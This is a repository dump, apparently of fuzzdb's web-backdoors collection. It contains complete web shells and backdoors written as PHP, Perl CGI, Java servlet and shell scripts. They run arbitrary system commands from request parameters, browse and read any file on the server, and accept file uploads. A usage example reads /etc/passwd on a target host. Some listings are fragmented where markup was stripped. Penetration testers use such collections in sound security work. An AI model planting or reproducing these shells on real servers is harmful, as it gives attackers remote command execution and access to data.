17 | 18 | if($_GET['cmd']) { 19 | system($_GET['cmd']); 20 | } 21 | ?> 22 |23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/list.php: -------------------------------------------------------------------------------- 1 | 2 | // 3 | // PHP_KIT 4 | // 5 | // list.php = Directory & File Listing 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | 13 | 14 | if($_GET['file']) { 15 | $fichero=$_GET['file']; 16 | } else { 17 | $fichero="/"; 18 | } 19 | 20 | if($handle = @opendir($fichero)) { 21 | while($filename = readdir($handle)) { 22 | echo "( ) " . $filename . "
"; 27 | $fp = fopen($fichero, "r"); 28 | $buffer = fread($fp, filesize($fichero)); 29 | echo $buffer; 30 | fclose($fp); 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/simple-backdoor.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/tiny.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/up.php: -------------------------------------------------------------------------------- 1 | 2 | // 3 | // PHP_KIT 4 | // 5 | // up.php = File Upload 6 | // 7 | // by: The Dark Raver 8 | // modified: 21/01/2004 9 | // 10 | ?> 11 | 12 | 13 | 14 |
'; 31 | 32 | if(defined $FORM{'cmd'}) { 33 | print "Results of '$cmd' execution:\n\n"; 34 | print "-"x80; 35 | print "\n"; 36 | 37 | open(CMD, "($cmd) 2>&1 |") || print "Could not execute command"; 38 | 39 | while("; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/pl-cgi/list.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # browse.pl: Browse and download files from a webserver 6 | 7 | use strict; 8 | 9 | my ($path, %FORM); 10 | 11 | $|=1; 12 | 13 | 14 | # Get parameters 15 | 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 17 | 18 | if(defined $FORM{'path'}) { 19 | $path = $FORM{'path'}; 20 | 21 | 22 | } else { 23 | $path = "/"; 24 | } 25 | 26 | if(-f $path) { # Download selected file 27 | print "Content-Type: application/octet-stream\r\n"; 28 | print "\r\n"; 29 | open(FILE, "< $path") || print "Could not open file\n"; 30 | 31 | while() { 40 | print; 41 | } 42 | 43 | close(CMD); 44 | print "-"x80; 45 | print "\n"; 46 | } 47 | 48 | print "
50 |
51 | ';
52 |
53 | if(defined $FORM{'path'}) {
54 |
55 | opendir(DIR, $path) || print "Could not open directory";
56 |
57 | foreach (sort(readdir(DIR))) {
58 | print get_fileinfo($path, $_). "\n";
59 | }
60 |
61 | closedir(DIR);
62 |
63 | }
64 |
65 | print "
";
66 |
67 | sub parse_parameters ($) {
68 | my %ret;
69 |
70 | my $input = shift;
71 |
72 | foreach my $pair (split('&', $input)) {
73 | my ($var, $value) = split('=', $pair, 2);
74 |
75 | if($var) {
76 | $value =~ s/\+/ /g ;
77 | $value =~ s/%(..)/pack('c',hex($1))/eg;
78 |
79 | $ret{$var} = $value;
80 | }
81 | }
82 |
83 | return %ret;
84 | }
85 |
86 | sub get_fileinfo ($$) {
87 | my $ret;
88 |
89 | my ($dir,$filename) = @_;
90 | my $file = $dir . "/" . $filename;
91 |
92 | $file=~s/\/+/\//g;
93 |
94 | $ret = "
"; 25 | my @cmd = `$req`; 26 | print ""; 27 | 28 | foreach my $line (@cmd) { 29 | print $line . "
Command: " + req.getParameter("cmd") + "\n
\n"); 27 | Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd")); 28 | DataInputStream procIn = new DataInputStream(p.getInputStream()); 29 | int c='\0'; 30 | while ((c=procIn.read()) != -1) { 31 | out.print((char)c); 32 | } 33 | } 34 | 35 | out.print("\n"); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/servlet/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\n
\n"); 24 | 25 | File file = new File(path); 26 | 27 | if(file.isDirectory()) 28 | { 29 | String s = new String("Unknown"); 30 | String s2 = new String("Black"); 31 | File afile[] = file.listFiles(); 32 | for(int i = 0; i < afile.length; i++) 33 | { 34 | String s1 = new String(afile[i].toString()); 35 | printwriter.write("("); 36 | String s3; 37 | if(afile[i].isDirectory()) 38 | { 39 | printwriter.write("d"); 40 | s1 = s1 + "/"; 41 | s3 = new String("Blue"); 42 | } else 43 | if(afile[i].isFile()) 44 | { 45 | printwriter.write("-"); 46 | s3 = new String("Green"); 47 | } else 48 | { 49 | printwriter.write("?"); 50 | s3 = new String("Red"); 51 | } 52 | if(afile[i].canRead()) 53 | printwriter.write("r"); 54 | else 55 | printwriter.write("-"); 56 | if(afile[i].canWrite()) 57 | printwriter.write("w"); 58 | else 59 | printwriter.write("-"); 60 | printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )"); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
\n"); 61 | } 62 | 63 | printwriter.write("
"); 37 | 38 | while((c=post.read()) != -1 && c != '\r' && c != '\n') { 39 | tag=tag.concat("" + (char)c); 40 | contador++; 41 | } 42 | 43 | for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++; 44 | 45 | // out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n"); 46 | // out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>"); 47 | 48 | // (!) Uploaded File Name 49 | 50 | File newfile = new File("c:\\install.log"); 51 | 52 | ///////////////////////// 53 | 54 | FileOutputStream fileout = new FileOutputStream(newfile); 55 | 56 | for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) { 57 | c=post.read(); 58 | fileout.write((char)c); 59 | } 60 | 61 | fileout.close(); 62 | out.print("<== OK"); 63 | 64 | } 65 | 66 | 67 | public String getServletInfo() { 68 | return "UpServlet 0.1"; 69 | } 70 | 71 | } -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/sh/cmd.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/sh/cmd.sh -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/sh/list.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # SH_KIT 4 | # 5 | # list.sh = Directory & File Listing 6 | # 7 | # by: The Dark Raver 8 | # modified: 16/12/2005 9 | # 10 | 11 | echo Content-Type: text/html 12 | echo 13 | 14 | if [ "$QUERY_STRING" != "" ] 15 | then 16 | echo PATH: $QUERY_STRING "
" 17 | echo `ls $QUERY_STRING` > /tmp/test 18 | else 19 | echo PATH: / "
" 20 | echo > /tmp/test 21 | QUERY_STRING="/" 22 | root="1" 23 | fi 24 | 25 | out=`grep "/" /tmp/test` 26 | 27 | if [ "$out" != "" ] 28 | then 29 | echo FICHERO: $QUERY_STRING 30 | echo "" 31 | cat $QUERY_STRING 32 | else 33 | if [ "$root" != "1" ] 34 | then 35 | echo "( ) ".."
" 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) "$i"
" 42 | else 43 | echo "( ) "$i"
" 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/sh/up.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # BETA1 - upload to /tmp/upload 4 | # 5 | # SH_KIT 6 | # 7 | # up.sh = File Upload 8 | # 9 | # by: The Dark Raver 10 | # modified: 16/12/2005 11 | # 12 | 13 | echo Content-Type: text/html 14 | echo 15 | 16 | echo "" 17 | echo "
" 41 | cat /tmp/upload 42 | echo "" 43 | 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/wordpress/templates/README.md: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/wordpress/templates/ipcheck.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools 20 | *** by someone other than the person who uploaded Laudanum. This file should be included 21 | *** in other Laudanum tools and not called directly. 22 | *** Written by Jason Gillam